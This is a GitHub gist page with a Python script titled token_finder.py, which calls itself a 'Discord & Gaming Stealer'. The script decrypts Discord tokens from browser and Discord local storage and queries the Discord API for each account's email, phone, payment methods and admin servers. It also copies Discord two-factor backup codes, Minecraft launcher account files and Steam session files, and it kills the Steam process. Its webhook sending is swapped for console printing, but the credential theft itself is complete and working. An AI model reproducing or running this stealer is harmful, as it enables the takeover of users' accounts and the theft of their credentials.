Skip to content

Instantly share code, notes, and snippets.

@LeetIDA

LeetIDA/token_finder.py

Last active July 5, 2025 10:47
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save LeetIDA/1d7f5de30c52ac1994b6a640bf43f5e6 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save LeetIDA/1d7f5de30c52ac1994b6a640bf43f5e6 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
token_finder.py
import requests
import psutil
import zipfile
import platform
import subprocess
import json
import shutil
import re
import base64
import random
import win32crypt
import socket
import os
import tempfile
import getpass
import sys
import ctypes
from ctypes import byref, c_bool, wintypes
try:
import win32crypt
except ImportError:
print("[!] win32crypt not available")
try:
from Crypto.Cipher import AES
except ImportError:
print("[!] Crypto library not available")
__CONFIG__ = {
"discord": True,
"system": False,
"startup": False,
"minecraft": True,
"Steam": True,
"Anti_Debugs_VM": False,
"backupcode": True,
"ERROR": False,
"webhook": "DISABLED_FOR_CONSOLE_OUTPUT",
"avatar_link": "DISABLED_FOR_CONSOLE_OUTPUT"
}
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
'Discord': ROAMING + '\\discord',
'Discord Canary': ROAMING + '\\discordcanary',
'Lightcord': ROAMING + '\\Lightcord',
'Discord PTB': ROAMING + '\\discordptb',
'Opera': ROAMING + '\\Opera Software\\Opera Stable',
'Opera GX': ROAMING + '\\Opera Software\\Opera GX Stable',
'Amigo': LOCAL + '\\Amigo\\User Data',
'Torch': LOCAL + '\\Torch\\User Data',
'Kometa': LOCAL + '\\Kometa\\User Data',
'Orbitum': LOCAL + '\\Orbitum\\User Data',
'CentBrowser': LOCAL + '\\CentBrowser\\User Data',
'7Star': LOCAL + '\\7Star\\7Star\\User Data',
'Sputnik': LOCAL + '\\Sputnik\\Sputnik\\User Data',
'Vivaldi': LOCAL + '\\Vivaldi\\User Data\\Default',
'Chrome SxS': LOCAL + '\\Google\\Chrome SxS\\User Data',
'Chrome': LOCAL + "\\Google\\Chrome\\User Data\\Default",
'Epic Privacy Browser': LOCAL + '\\Epic Privacy Browser\\User Data',
'Microsoft Edge': LOCAL + '\\Microsoft\\Edge\\User Data\\Default',
'Uran': LOCAL + '\\uCozMedia\\Uran\\User Data\\Default',
'Yandex': LOCAL + '\\Yandex\\YandexBrowser\\User Data\\Default',
'Brave': LOCAL + '\\BraveSoftware\\Brave-Browser\\User Data\\Default',
'Iridium': LOCAL + '\\Iridium\\User Data\\Default'
}
def kill(name):
try:
for proc in psutil.process_iter(['pid', 'name']):
if proc.info['name'] and proc.info['name'].lower() == name.lower():
proc.kill()
except:
pass
def get_master_key(path: str):
local_state_path = os.path.join(path, "Local State")
try:
with open(local_state_path, 'r', encoding='utf-8') as f:
local_state = json.load(f)
encrypted_key = base64.b64decode(local_state['os_crypt']['encrypted_key'])[5:]
return win32crypt.CryptUnprotectData(encrypted_key, None, None, None, 0)[1]
except Exception as e:
return None
def decrypt_value(encrypted_value: bytes, master_key: bytes) -> str:
try:
if encrypted_value[:3] == b"v10":
iv = encrypted_value[3:15]
payload = encrypted_value[15:-16]
tag = encrypted_value[-16:]
cipher = AES.new(master_key, AES.MODE_GCM, iv)
decrypted = cipher.decrypt_and_verify(payload, tag)
return decrypted.decode()
except Exception:
pass
return ""
def tokens(token: str):
headers = {
"Authorization": token,
"Content-Type": "application/json",
"User-Agent": (
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 "
"(KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36"
)
}
try:
user_get = requests.get("https://discord.com/api/v10/users/@me", headers=headers)
if user_get.status_code != 200:
return
user = user_get.json()
BADGES = {
1: "<:8485discordemployee:1163172252989259898>",
2: "<:9928discordpartnerbadge:1163172304155586570>",
4: "<:9171hypesquadevents:1163172248140660839>",
8: "<:4744bughunterbadgediscord:1163172239970140383>",
64: "<:6601hypesquadbravery:1163172246492287017>",
128: "<:6936hypesquadbrilliance:1163172244474822746>",
256: "<:5242hypesquadbalance:1163172243417858128>",
512: "<:5053earlysupporter:1163172241996005416>",
16384: "<:1757bugbusterbadgediscord:1163172238942543892>",
131072: "<:1207iconearlybotdeveloper:1163172236807639143>",
262144: "<:4149blurplecertifiedmoderator:1163172255489085481>",
4194304: "<:1207iconactivedeveloper:1163172534443851868>",
}
user_id = user.get("id")
user_name = user.get("username")
email = user.get("email", "None")
phone = user.get("phone", "None")
guild_tag = user.get("primary_guild", {}).get("tag", "None")
public_flags = user.get("public_flags", 0)
avatar_hash = user.get("avatar")
lang = user.get("locale")
friendinvite_res = requests.post("https://discord.com/api/v9/users/@me/invites", headers=headers)
friendinvite_code = friendinvite_res.json().get('code', 'None') if friendinvite_res.ok else 'None'
user_badges = [name for bit, name in BADGES.items() if public_flags & bit]
avatar = f"https://cdn.discordapp.com/avatars/{user_id}/{avatar_hash}.png" if avatar_hash else None
premium_type = user.get("premium_type", 0)
nitro_type = {
0: "None",
1: "<:nitro_classic:1363064691282149418> Nitro Classic",
2: "<:nitro_booster:1363009541515513986> Nitro Boost",
3: "<:nitro_booster:1363009541515513986> <:nitro_classic:1363064691282149418> Basic Nitro"
}.get(premium_type, "❓️")
mfa = "Enabled" if user.get("mfa_enabled", "❓️") else "Disabled"
methods = "❌"
try:
payment = requests.get("https://discord.com/api/v6/users/@me/billing/payment-sources", headers=headers)
if payment.ok:
for method in payment.json():
if method['type'] == 1:
methods += "💳"
elif method['type'] == 2:
methods += "<:paypal:973417655627288666>"
else:
methods += "❓"
except:
pass
guilds = requests.get("https://discord.com/api/v8/users/@me/guilds", headers=headers).json()
found_guilds = False
hq_guilds = []
if isinstance(guilds, list):
for guild in guilds:
try:
admin = int(guild['permissions']) & 0x8 == 0x8
if admin:
preview_res = requests.get(
f"https://discord.com/api/v8/guilds/{guild['id']}/preview", headers=headers
)
if preview_res.status_code == 200:
preview = preview_res.json()
approximate_member_count = preview.get('approximate_member_count', 0)
approximate_presence_count = preview.get('approximate_presence_count', 0)
else:
approximate_member_count = 0
approximate_presence_count = 0
owner = "✅" if guild.get('owner', False) else "❌"
invites_res = requests.get(
f"https://discord.com/api/v8/guilds/{guild['id']}/invites", headers=headers
)
if invites_res.status_code == 200:
invites = invites_res.json()
if invites:
invite = f"https://discord.gg/{invites[0]['code']}"
found_guilds = True
else:
invite = "https://youtu.be/dQw4w9WgXcQ"
else:
invite = "https://youtu.be/dQw4w9WgXcQ"
data = (
f"\u200b\n**{guild['name']} ({guild['id']})** \n"
f"Owner: `{owner}` | Members: ` ⚫ {approximate_member_count} / 🟢 {approximate_presence_count} / 🔴 {approximate_member_count - approximate_presence_count} `\n"
f"[Join Server]({invite})"
)
if len('\n'.join(hq_guilds)) + len(data) >= 1024:
break
hq_guilds.append(data)
except Exception:
continue
if hq_guilds:
hq_guilds = '\n'.join(hq_guilds)
else:
hq_guilds = None
#:TOKENPARADISE:
#<a:hq:1373228906743599155>
fields = [
{"name": "<a:TOKENPARADISE:1363009172290928690> TOKEN", "value": f"```{token}```", "inline": False},
{"name": "<:9171hypesquadevents:1163172248140660839> Badge", "value": f"-# {', '.join(user_badges) if user_badges else 'None'}", "inline": True},
{"name": ":white_check_mark: MFA", "value": mfa, "inline": True},
{"name": "<a:n1:1380695050484453408> Nitro", "value": nitro_type, "inline": True},
{"name": ":credit_card: Payment", "value": methods, "inline": True},
{"name": "<:tag:1380757481390604429> TAG", "value": f"```{guild_tag}```", "inline": True},
{"name": "<:lang:1380757912200282152> Language", "value": lang, "inline": True},
{"name": "<a:hq:1373228906743599155> Friends Invite", "value": f"https://discord.gg/{friendinvite_code}", "inline": True},
{"name": "<a:rainbow_heart:1380758186344317091> Email", "value": f"```{email}```", "inline": False},
{"name": "<:Telephone:1380759026069016627> Phone", "value": f"```{phone}```", "inline": False},
]
if found_guilds:
fields.append({
"name": "<a:hq:1373228906743599155> HQ Guilds",
"value": hq_guilds,
"inline": False
})
else:
pass
# Print Discord token information to console instead of webhook
print(f"[+] Discord Token Found for {user_name} ({user_id})")
for field in fields:
print(f" {field['name']}: {field['value']}")
if avatar:
print(f" Avatar URL: {avatar}")
print("-" * 50)
except Exception as e:
print(f"Error: {e}")
def find_token():
print("[*] Starting Discord token search...")
found_tokens = set()
for app, path in PATHS.items():
local_storage_path = os.path.join(path, "Local Storage", "leveldb")
if not os.path.exists(local_storage_path):
continue
master_key = get_master_key(path)
if master_key is None:
continue
for file in os.listdir(local_storage_path):
if not file.endswith(".ldb") and not file.endswith(".log"):
continue
try:
with open(os.path.join(local_storage_path, file), "r", errors="ignore") as f:
for line in f:
matches = re.findall(r'dQw4w9WgXcQ:([a-zA-Z0-9+/=]+)', line)
for match in matches:
try:
encrypted_token = base64.b64decode(match)
decrypted_token = decrypt_value(encrypted_token, master_key)
if decrypted_token:
found_tokens.add(decrypted_token.strip())
except Exception:
continue
except PermissionError:
continue
valid_tokens = [token for token in found_tokens if valid_token(token)]
if valid_tokens:
print(f"[+] Found {len(valid_tokens)} valid Discord token(s)")
for token in valid_tokens:
tokens(token)
else:
print("[-] No valid Discord tokens found")
print("-" * 50)
def valid_token(token: str) -> bool:
valid = False
invalid = False
headers = {
"Authorization": token,
"Content-Type": "application/json",
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/37.0.2062.94 Chrome/37.0.2062.94 Safari/537.36'
}
try:
response = requests.get("https://discord.com/api/v9/users/@me", headers=headers)
return response.status_code == 200
except requests.RequestException:
return False
def minecraft_profile():
sent = False
error = False
appdata = os.getenv("APPDATA")
accounts_path = os.path.join(appdata, ".minecraft", "launcher_accounts.json")
usercache_path = os.path.join(appdata, ".minecraft", "usercache.json")
launcher_account = "NOT FOUND"
usercache = "NOT FOUND"
if os.path.exists(accounts_path):
with open(accounts_path, "r", encoding="utf-8") as src:
with tempfile.NamedTemporaryFile(delete=False, suffix=".txt", mode="w+", encoding="utf-8") as temp:
shutil.copyfileobj(src, temp)
temp.seek(0)
launcher_account = temp.read()
if os.path.exists(usercache_path):
with open(usercache_path, "r", encoding="utf-8") as src:
with tempfile.NamedTemporaryFile(delete=False, suffix=".txt", mode="w+", encoding="utf-8") as temp:
shutil.copyfileobj(src, temp)
temp.seek(0)
usercache = temp.read()
# Print Minecraft profile information to console instead of webhook
print("[+] Minecraft Profile Information")
print(f"launcher_accounts.json: {launcher_account[:1000]}")
print(f"usercache.json: {usercache[:1000]}")
print("-" * 50)
sent = True
def minecraft_cache():
print("[*] Checking for Minecraft profiles...")
minecraftprofilefound = False
appdata = os.getenv("appdata")
minecraft_path = os.path.join(appdata, ".minecraft")
if os.path.exists(minecraft_path):
minecraftprofilefound = True
minecraft_profile()
else:
print("[-] No Minecraft installation found")
print("-" * 50)
def steam():
print("[*] Searching for Steam sessions...")
kill("Steam.exe")
os.system("cls")
steam_path = os.environ.get("PROGRAMFILES(X86)", "") + "\\Steam"
if os.path.exists(steam_path):
ssfn_files = [os.path.join(steam_path, file) for file in os.listdir(steam_path) if file.startswith("ssfn")]
steam_config_path = os.path.join(steam_path, "config")
zip_path = os.path.join(os.environ['TEMP'], "session_steam.zip")
with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zp:
if os.path.exists(steam_config_path):
for root, dirs, files in os.walk(steam_config_path):
for file in files:
zp.write(os.path.join(root, file), os.path.relpath(os.path.join(root, file), steam_path))
for ssfn_file in ssfn_files:
zp.write(ssfn_file, os.path.basename(ssfn_file))
# Print Steam session information to console instead of webhook
print("[+] Steam Session Found")
print(f"Steam path: {steam_path}")
print(f"SSFN files found: {len(ssfn_files)}")
print(f"Config files archived: {os.path.exists(steam_config_path)}")
print("Steam session data collected successfully")
print("-" * 50)
os.remove(zip_path)
else:
print("[-] No Steam installation found")
print("-" * 50)
def discord_backup_code_steal():
print("[*] Searching for Discord backup codes...")
user_download_dir = os.path.join(os.environ['USERPROFILE'], 'Downloads')
source_file = os.path.join(user_download_dir, 'discord_backup_codes.txt')
if not os.path.exists(source_file):
print("[-] No Discord backup codes found")
print("-" * 50)
return
temp_dir = tempfile.gettempdir()
temp_file = os.path.join(temp_dir, 'discord_backup_codes.txt')
shutil.copy2(source_file, temp_file)
# Print discord backup codes information to console instead of webhook
try:
with open(temp_file, 'r') as f:
content = f.read()
print("[+] Discord Backup Codes Found")
print(f"Backup codes: {content[:500]}...") # Show first 500 chars
print("-" * 50)
except Exception as e:
print(f"[!] Error reading backup codes: {e}")
print("-" * 50)
# Clean up temp file
try:
os.remove(temp_file)
except:
pass
def run_config():
# =========================== #
if __CONFIG__.get("discord"):
find_token()
# =========================== #
if __CONFIG__.get("backupcode"):
discord_backup_code_steal()
# =========================== #
if __CONFIG__.get("minecraft"):
minecraft_cache()
# =========================== #
if __CONFIG__.get("Steam"):
steam()
# =========================== #
print("=" * 60)
print("🔍 DISCORD & GAMING STEALER")
print(" Features: Discord Tokens, Backup Codes, Minecraft, Steam")
print("=" * 60)
run_config()
print("=" * 60)
print("✅ STEALER EXECUTION COMPLETED")
print("=" * 60)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment